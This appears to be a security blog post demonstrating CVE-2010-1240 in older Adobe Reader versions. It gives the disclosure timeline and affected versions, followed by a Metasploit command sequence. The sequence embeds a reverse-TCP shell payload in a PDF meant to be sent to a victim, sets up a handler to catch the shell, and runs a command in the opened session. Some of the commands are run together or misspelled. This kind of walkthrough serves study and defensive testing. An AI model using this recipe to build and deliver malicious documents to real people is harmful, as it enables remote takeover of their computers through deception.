aka wow on ZATAZ.com
CVE-2010-1240 : Adobe PDF Embedded EXE Social Engineering
Timeline :
Vulnerability discovered & disclosed by Didier Stevens the 2010-03-29
Exploit-DB PoC provided by Didier Stevens the 2010-03-31
PoC provided by :
jduck
Colin Ames
Reference(s) :
Affected version(s) :
Adobe Reader 9.3.2 and earlier versions for Windows, Macintosh, and UNIX
Adobe Acrobat 9.3.2 and earlier versions for Windows and Macintosh4
Tested on Windows XP SP3 with :
Adobe Reader 9.3.0
Description :
This module embeds a Metasploit payload into an existing PDF file. The resulting PDF can be sent to a target as part of a social engineering attack.
Commands :
use exploit/windows/fileformat/adobe_pdf_embedded_exe
set OUTPUTPATH /home/eromang
set INFILENAME metasploit.pdf
set TARGET 0
set PAYLOAD windows/shell/reverse_tcp
set LHOST 192.168.178.21
exploituse exploit/multi/handler
set PAYLOAD windows/shell/reverse_tcp
set LHOST 192.168.178.21
expoit -jsessions -i 1
dir
I recommend you to read these related posts
- CVE-2010-2883 : Adobe CoolType SING Table “uniqueName” Stack Buffer Overflow
- CVE-2010-0188 : Adobe Acrobat Bundled LibTIFF Integer Overflow
- CVE-2009-3953 : Adobe Acrobat U3D CLODProgressiveMeshDeclaration Array Overrun
- CVE-2009-0927 : Adobe Acrobat Collab.getIcon Buffer Overflow
- CVE-2007-5659 : Adobe Acrobat Collab.collectEmailInfo Buffer Overflow
- CVE-2008-2992 : Adobe Acrobat util.printf Buffer Overflow
- CVE-2009-0658 : Adobe Acrobat JBIG2Decode Memory Corruption Exploit
- Adobe August 2012 Patch Tuesday Review
- CVE-2010-3654 : Adobe Flash Player Button Remote Code Execution
- Exploitation Demo of Fake Mandiant APT1 Report PDF
